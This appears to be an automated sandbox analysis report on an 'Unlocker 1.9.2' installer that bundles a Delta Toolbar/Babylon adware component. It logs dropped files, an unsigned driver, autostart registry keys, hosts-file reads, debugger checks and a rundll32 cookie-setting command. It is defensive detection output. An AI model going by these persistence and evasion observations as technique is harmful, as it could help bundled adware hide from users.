Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Unlocker\UnlockerCOM.dll"Jump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: README.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\README.TXT
Source: Start Unlocker.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\Unlocker.exe
Source: Website.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\Unlocker.url
Source: Uninstall.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Unlocker\uninst.exe
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5445.tmpJump to behavior
Source: Unlocker.exe.0.drBinary string: %s\Unlocker-Log.txt\Device\LanmanRedirector%S%S\LanmanRedirector\%S\??\LanmanRedirector%c:\\.\%c:"0:\%s\\\\?\%s\Unlocker.cfgIsWow64Processopenhttp://unlocker.emptyloop.com/GET /unlocker/version.txt HTTP/1.0
Source: UnlockerDriver5.sys.0.drBinary string: C2C\DosDevices\UnlockerDriver5\Device\UnlockerDriver5
Source: classification engineClassification label: mal48.spyw.evad.winEXE@15/56@3/2
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHAutoComplete,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceExA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041CD
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, Setup.exe, 00000002.00000003.352019348.000000000089E000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);name='%q'
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');sqlite_sequence
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Setup.exe, 00000002.00000002.361206372.0000000060901000.00000020.00000001.01000000.00000010.sdmp, sqlite3.dll.2.dr, sqlite3.dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;U
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049D9C0 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_0049D9C0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A1B44 LoadResource,SizeofResource,LockResource,1_2_009A1B44
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile written: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\Delta.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: OK
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Next >
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: I Agree
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Next >
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Next >
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAutomated click: Install
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v2.46 Nullsoft Install System v2.46License AgreementPlease review the license terms before installing Unlocker 1.9.2.Press Page Down to see the rest of the agreement.A. Unlocker End User License AgreementB. Delta Toolbar End User License AgreementA. Unlocker End User License AgreementThis software is provided "as is" without any guarantee made as to its suitability or fitness for any particular use. It may contain bugs so use of this tool is at your own risk. We take no responsibility for any damage that may unintentionally be caused through its use.You may not distribute Unlocker in any form without express written permission of Cedrick Collomb (ccollomb@emptyloop.com)B. Delta Toolbar End User License AgreementYou have the option of installing the Delta Toolbar. By Installing the Delta Toolbar you agree to Delta End-User Licence Agreement and Delta Privacy Statement. You can easily remove this application at any time.o Delta End-User Licence Agreement: http://info.delta-search.com/uninstall/eula.htmlo Delta Privacy Statement http://info.delta-search.com/uninstall/privacy.htmlIf you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Unlocker 1.9.2.
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UnlockerJump to behavior
Source: Unlocker1.9.2.exeStatic file information: File size 1078591 > 1048576
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\Unlocker.exeJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerInject32.exeJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\UnlockerCOM.dllJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\Unlocker.urlJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDirectory created: C:\Program Files\Unlocker\uninst.exeJump to behavior
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdb source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: Binary string: C:\projects\meitar-branch\SP_Meitar\Release_Win32\ReportUrlDll.pdb source: setup.exe, 00000006.00000000.352332785.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe, 00000006.00000002.353687641.0000000000EE2000.00000002.00000001.01000000.00000012.sdmp, setup.exe.2.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdbp source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdbN source: Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\BExternal.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.351621352.000000000089D000.00000004.00000020.00020000.00000000.sdmp, BExternal.dll.1.dr, BExternal.dll.2.dr
Source: Binary string: D:\Projects\Setup_9.1.1\Release_Win32\Setup32.pdbp;V source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.dr
Source: Binary string: D:\Projects\Babylon\Setup1_Win32\Setup_Stub.pdb source: DeltaTB.exe, 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, DeltaTB.exe, 00000001.00000000.339008902.00000000009A4000.00000002.00000001.01000000.00000009.sdmp, Unlocker1.9.2.exe, DeltaTB.exe.0.dr
Source: Binary string: D:\Projects\Setup_9.1.0\Release_Win32\IEHelper.pdb source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, IEHelper.dll.2.dr, IEHelper.dll.1.dr
Source: Binary string: c:\Documents and Settings\Cedrick\My Documents\Cedrick\Backup Office\My Sources\Visual Studio Projects\Unlocker\Release64\Unlocker.pdbH source: Unlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004568A5 push ecx; ret 2_2_004568B8
Source: BExternal.dll.1.drStatic PE information: section name: .SHARDAT
Source: sqlite3.dll.1.drStatic PE information: section name: .stab
Source: sqlite3.dll.1.drStatic PE information: section name: .stabstr
Source: sqlite3.dll.2.drStatic PE information: section name: .stab
Source: sqlite3.dll.2.drStatic PE information: section name: .stabstr
Source: BExternal.dll.2.drStatic PE information: section name: .SHARDAT
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll

Persistence and Installation Behavior

barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerCOM.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\sqlite3.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\uninst.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\DeltaTB.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\IEHelper.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\IEHelper.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerInject32.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\Unlocker.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\sqlite3.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\LangDLL.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\README.TXTJump to behavior

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWindow found: window name: ProgmanJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeWindow found: window name: ProgmanJump to behavior
Creates an undocumented autostart registry key
Source: C:\Windows\System32\regsvr32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\UnlockerShellExtension NULLJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UnlockerJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\README.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Start Unlocker.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Website.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnkJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UnlockerDriver5Jump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049D9C0 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_0049D9C0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-32026
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-32039
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\BExternal.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\BExternal.dllJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\uninst.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\UnlockerInject32.exeJump to dropped file
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeDropped PE file which has not been started: C:\Program Files\Unlocker\Unlocker.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: _memset,GetVolumeInformationW,_memset,GetAdaptersInfo,_memset,StringFromGUID2,2_2_004F4BC0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A121F _wcscpy,_wcscpy,_wcscat,FindFirstFileW,1_2_009A121F
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049F0E0 FindFirstFileW,FindClose,2_2_0049F0E0
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeAPI call chain: ExitProcess graph end nodegraph_0-3146
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
Source: rundll32.exe, 00000003.00000002.347884515.0000000003428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: Setup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A3BC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009A3BC5
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0049D9C0 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,Process32NextW,FindCloseChangeNotification,2_2_0049D9C0
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0044F1DA IsProcessorFeaturePresent,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,InterlockedCompareExchange,GetProcessHeap,HeapFree,2_2_0044F1DA
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A3BC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009A3BC5
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0045567D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0045567D
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0044F6C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0044F6C8
Source: Setup.exeBinary or memory string: Progman
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: buyprc://%s,%d,%dCP_LINK<a id='%s' href='buyprc://%s,%d,%d'>%s</a> rbBF::RL%dwbBF::WL%dBLS_BLSBLS_~BLSBLS_CNLBLS_AL 0x%p 0x%p 0x%pBLS_AIN 0x%pBLS_GAPBLS_BLS_HFTPBLS_BLS_HTSPBLS_BLS_HUTPBLS_GTCLBLS_GCP3_1BLS_GCP3_2BLS_GPLNUBLS_BLS_HFTPBL_SCUIZ 0x%p 0x%pBLS_GCP4BLS::HCT%dBLS_GCP1 %d %d %d %dBLS::SSD%dBLS::GSD%dBLS::CC%dBLS_GCP2BLS_SCPBLS_GDICBLS_GVICBLS_GVOICBLS_GVVCBLS_DGP %d %d %d 0x%pBLS_GP1BLS_GP2 %d %d %dBLS_FNUFBLS_GP3BLS_GFT 0x%p 0x%pBLS::RC%dBLS::RAL%dBLS_RLBHBLS_GFCBLS_GFNTSBLS_GSTSBLS_GFPBLS_GNPBLS_GFLBLS_GNLBLS_GLBHBLS_GLBCBLS_ICRC 0x%p 0x%pBLS_ICRC1 0x%pBLS::IBL%dBLS::BL%dBLS::UBL%dBLS::DBL%dBLS::GLAI%dTRIALCORPUNLICENSED_CORPCEPROOTHERBLS::GPLL%dBLS::GCSD%dBLS::GCED%dBLS::GMED%dBLS::GCTL%dBLS::GCML%dBLS::GLI%dBLS::IT%dBLS::IR%dBLS::PL%dBLS::APL%dBLS::AVL%dIDIDRandRNDMinVersionVLicNameLNUserNameUNFeatureTypeFTFeatureIDFIDStartDateSLicenseMonthsLMLicenseDaysLDMaintMonthesMMMaintDaysMDFeatureNameFNMaintEndMEMaxPushMPUpgradeUPProductVersionPVURIURIBCL_GCTCBCL_IFSBCL_ITL%dBCL_HFBCL_GMTBCL_CFIDBCL_CPIDBCL_CVIDBCL_CFBCL_IFBCL_IUBCL_IVOKBCL::GFNTS%dBCL::GSTSIP%d%d 